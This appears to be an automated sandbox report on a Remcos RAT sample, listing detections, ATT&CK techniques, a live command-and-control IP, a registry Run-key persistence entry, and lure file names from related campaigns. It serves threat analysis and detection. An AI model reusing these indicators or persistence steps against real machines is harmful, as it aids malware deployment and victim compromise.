            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: cmd.exe0_2_00405042
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: cmd.exe17_2_00405042
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: cmd.exe20_2_00405042
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: cmd.exe38_2_00405042

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts12
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Bypass User Account Control            		3
            Obfuscated Files or Information            		111
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol111
            Input Capture            		2
            Encrypted Channel            		Exfiltration Over Bluetooth1
            Defacement
            Email AddressesDNS ServerDomain Accounts2
            Service Execution            		11
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		12
            Software Packing            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares3
            Clipboard Data            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Windows Service            		1
            DLL Side-Loading            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script22
            Process Injection            		1
            Bypass User Account Control            		LSA Secrets23
            System Information Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
            Registry Run Keys / Startup Folder            		1
            Masquerading            		Cached Domain Credentials141
            Security Software Discovery            		VNCGUI Input Capture12
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync2
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem2
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt22
            Process Injection            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588844 Sample: yPIOW6yoPi.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 57 geoplugin.net 2->57 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 8 other signatures 2->73 8 yPIOW6yoPi.exe 1 4 2->8         started        12 yavascript.exe 2->12         started        14 yavascript.exe 2->14         started        signatures3 process4 file5 49 C:\Users\user\AppData\...\yavascript.exe, PE32 8->49 dropped 51 C:\Users\...\yavascript.exe:Zone.Identifier, ASCII 8->51 dropped 75 Contains functionality to bypass UAC (CMSTPLUA) 8->75 77 Detected unpacking (changes PE section rights) 8->77 79 Detected Remcos RAT 8->79 81 6 other signatures 8->81 16 yavascript.exe 8->16         started        20 WerFault.exe 16 8->20         started        23 WerFault.exe 16 8->23         started        27 6 other processes 8->27 25 WerFault.exe 12->25         started        signatures6 process7 dnsIp8 53 198.23.227.212, 32583, 49753 AS-COLOCROSSINGUS United States 16->53 55 geoplugin.net 178.237.33.50, 49828, 80 ATOM86-ASATOM86NL Netherlands 16->55 59 Multi AV Scanner detection for dropped file 16->59 61 Contains functionality to bypass UAC (CMSTPLUA) 16->61 63 Detected unpacking (changes PE section rights) 16->63 65 5 other signatures 16->65 29 WerFault.exe 16->29         started        31 WerFault.exe 16->31         started        33 WerFault.exe 16->33         started        35 3 other processes 16->35 37 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->37 dropped 39 C:\ProgramData\Microsoft\...\Report.wer, Unicode 23->39 dropped 41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->41 dropped 43 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->43 dropped 45 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->45 dropped 47 3 other malicious files 27->47 dropped file9 signatures10 process11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            yPIOW6yoPi.exe71%ReversingLabsWin32.Trojan.Smokeloader
            yPIOW6yoPi.exe100%AviraTR/Crypt.ZPACK.Gen
            yPIOW6yoPi.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\xenor\yavascript.exe71%ReversingLabsWin32.Trojan.Smokeloader

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            		178.237.33.50
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gp4yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://upx.sf.netAmcache.hve.4.drfalse
                    		high
                    http://geoplugin.net/json.gp/CyPIOW6yoPi.exe, 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, yPIOW6yoPi.exe, 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, yPIOW6yoPi.exe, 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://geoplugin.net/json.gplyavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://geoplugin.net/json.gpkyavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://geoplugin.net/json.gpSystem32yavascript.exe, 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://geoplugin.net/json.gp.yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              198.23.227.212
                              		unknownUnited States
                              		36352AS-COLOCROSSINGUStrue
                              178.237.33.50
                              		geoplugin.netNetherlands
                              		8455ATOM86-ASATOM86NLfalse

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1588844
                              Start date and time:2025-01-11 06:11:42 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 11m 5s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:40
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:yPIOW6yoPi.exe
                              renamed because original name is a hash value
                              Original Sample Name:4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347.exe
                              Detection:MAL
                              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@20/64@1/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 33
                              • Number of non-executed functions: 381
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.182.143.212, 13.107.246.45, 20.190.159.71, 4.175.87.197, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: yPIOW6yoPi.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              00:12:51API Interceptor2x Sleep call for process: WerFault.exe modified
                              00:13:26API Interceptor4303399x Sleep call for process: yavascript.exe modified
                              06:12:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983 "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                              06:12:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983 "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              198.23.227.212requests-pdf.exeGet hashmaliciousRemcosBrowse
                                E84Ddy7gSh.exeGet hashmaliciousRemcosBrowse
                                  advancePayment-pdf.exeGet hashmaliciousRemcosBrowse
                                    YESOHDKMIm.exeGet hashmaliciousRemcosBrowse
                                      NujUXO42Rg.exeGet hashmaliciousRemcosBrowse
                                        ZeaS4nUxg4.exeGet hashmaliciousRemcosBrowse
                                          documents-pdf.exeGet hashmaliciousRemcosBrowse
                                            1kZ9olJiaG.exeGet hashmaliciousRemcosBrowse
                                              ltlbVjClX9.exeGet hashmaliciousRemcosBrowse
                                                178.237.33.50bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • geoplugin.net/json.gp
                                                preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • geoplugin.net/json.gp
                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • geoplugin.net/json.gp
                                                173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                geoplugin.netbwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 178.237.33.50
                                                preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 178.237.33.50
                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 178.237.33.50
                                                173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AS-COLOCROSSINGUSC2R7VV2QmG.exeGet hashmaliciousRemcosBrowse
                                                • 192.210.150.26
                                                8kjlHXmbAY.exeGet hashmaliciousRemcosBrowse
                                                • 192.210.150.26
                                                OKkUGRkZV7.exeGet hashmaliciousRemcosBrowse
                                                • 192.3.64.152
                                                NssBkEQKsI.exeGet hashmaliciousRemcosBrowse
                                                • 192.210.150.26
                                                l1QC9H0SNR.exeGet hashmaliciousRemcosBrowse
                                                • 192.210.150.26
                                                MLxloAVuCZ.exeGet hashmaliciousRemcosBrowse
                                                • 192.3.64.152
                                                bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                • 192.210.150.26
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 192.3.27.144
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 192.3.27.144
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 192.3.27.144
                                                ATOM86-ASATOM86NLbwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 178.237.33.50
                                                preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 178.237.33.50
                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 178.237.33.50
                                                173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_f1164e2edceb3e426fcc8f132ef36e41c5c6259_1752a2a0_ca2fc48c-3ee1-4ae6-930c-46450d7d3581\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.008457597434543
                                                Encrypted:false
                                                SSDEEP:384:OCCIH9dwyKcxwy4Jtj+zuiFrY4IO8GuT:O2TxwyCj+zuiFrY4IO8
                                                MD5:C9C8D7DE0957B36A0919ABF8572A8164
                                                SHA1:789870ECD86D3FE7D27502E17B24A86E810BADA4
                                                SHA-256:25BC548AAF389CDE82EC077942F3DA39300CBB11CE44420BCE50C89EAD8C9C3B
                                                SHA-512:42A93737F624B86E3A0E6FFBC82C5AE460305F47516C3FB2EF5F73CDF2A9719E93C07E4FFCFBAEB250FD44709F804D07AB22F946559ED2D0EE7AEE4D40FE1F8A
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.7.2.9.5.6.4.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.8.0.3.0.0.0.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.2.f.c.4.8.c.-.3.e.e.1.-.4.a.e.6.-.9.3.0.c.-.4.6.4.5.0.d.7.d.3.5.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.0.d.4.b.5.e.-.d.1.a.a.-.4.7.1.8.-.8.0.8.b.-.9.6.2.d.3.8.2.9.2.c.5.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_fd4b28536be3f5f250312b9457878378f496af_1752a2a0_039bda82-6726-4bed-ba54-b8025f3f7407\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9378506197517005
                                                Encrypted:false
                                                SSDEEP:192:qpYdIHpzpzDypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:qCIH9dDyn56reJtjKzuiFrY4IO8buT
                                                MD5:DB03EBF63C7A17174983306F0BF22BE5
                                                SHA1:9625BB1AE71D56FE2A0FCD5372347D2356A5F8C8
                                                SHA-256:1D1786B1D221FB282E523066F8E90D99B21D916DEFEE42A4C06129B69BD717C6
                                                SHA-512:B6C3FA8D26F612E208E11DAB22F454026342470507575834B46C22539537DC2920238EAB0EBB5A415F4E35A59CA68B9EFA75CB116F089E708A2790D16F6E94B0
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.2.6.3.4.7.5.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.9.b.d.a.8.2.-.6.7.2.6.-.4.b.e.d.-.b.a.5.4.-.b.8.0.2.5.f.3.f.7.4.0.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.3.d.c.1.8.5.-.0.f.a.f.-.4.2.b.2.-.9.c.1.5.-.8.1.e.8.7.2.6.0.3.7.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_fd4b28536be3f5f250312b9457878378f496af_1752a2a0_7145277a-e9bd-46c5-bc6a-b581742e3b6f\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9375026489286793
                                                Encrypted:false
                                                SSDEEP:192:uvpYdIHpzpzurypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:4CIH9duryn56reJtjKzuiFrY4IO8buT
                                                MD5:A7026CFEC52F9CC4EA9F7C9B9E8BDA2F
                                                SHA1:097301A476BF029137A4FF3F76F712BB08B6739E
                                                SHA-256:A27DC6008D69687CB7BF5BBE8F84D44D7B172F3A652D887F0F69505F04670AE6
                                                SHA-512:82C89EC956AA6B17C50BCF4498C7C9B8C3BBCC8EF295CAECF541D1E638B02D7BECB92DA351E63F96B4795A0D220A1F7168DA60766D2802EC6B9CD1D3412E757B
                                                Malicious:true
